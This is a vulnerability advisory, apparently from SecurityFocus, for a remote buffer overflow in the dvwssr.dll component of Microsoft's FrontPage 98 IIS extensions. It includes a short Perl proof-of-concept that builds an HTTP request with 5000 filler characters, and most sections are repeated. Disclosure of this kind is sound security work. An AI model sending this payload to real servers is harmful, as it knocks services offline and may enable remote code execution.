MS IIS FrontPage 98 Extensions Buffer Overflow Vulnerability
BID:1109
Info
MS IIS FrontPage 98 Extensions Buffer Overflow Vulnerability
| Bugtraq ID: | 1109 |
| Class: | Boundary Condition Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Apr 14 2000 12:00AM |
| Updated: | Apr 14 2000 12:00AM |
| Credit: | This vulnerability was discovered by Richie & Beto of CORE SDI and posted to the Bugtraq mailing list on April 14, 2000. |
| Vulnerable: |
Microsoft InterDev 1.0 Microsoft FrontPage 98 Server Extensions for IIS |
| Not Vulnerable: | |
Discussion
MS IIS FrontPage 98 Extensions Buffer Overflow Vulnerability
The dvwssr.dll included with the FrontPage 98 extensions for IIS and shipped as part of the NT Option Pack has a remotely exploitable buffer overflow. This attack will result in the service no longer accepting connections and may allow for remote code execution on the vulnerable host.
The dvwssr.dll included with the FrontPage 98 extensions for IIS and shipped as part of the NT Option Pack has a remotely exploitable buffer overflow. This attack will result in the service no longer accepting connections and may allow for remote code execution on the vulnerable host.
Exploit / POC
MS IIS FrontPage 98 Extensions Buffer Overflow Vulnerability
#!/usr/bin/perl
print "GET /_vti_bin/_vti_aut/dvwssr.dll?";
print "a" x 5000;
print " HTTP/1.1\nHost: yourhost\n\n";
#!/usr/bin/perl
print "GET /_vti_bin/_vti_aut/dvwssr.dll?";
print "a" x 5000;
print " HTTP/1.1\nHost: yourhost\n\n";
Solution / Fix
MS IIS FrontPage 98 Extensions Buffer Overflow Vulnerability
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
Solution:
Currently the SecurityFocus staff are not aware of any vendor supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected].
References
MS IIS FrontPage 98 Extensions Buffer Overflow Vulnerability
References:
References: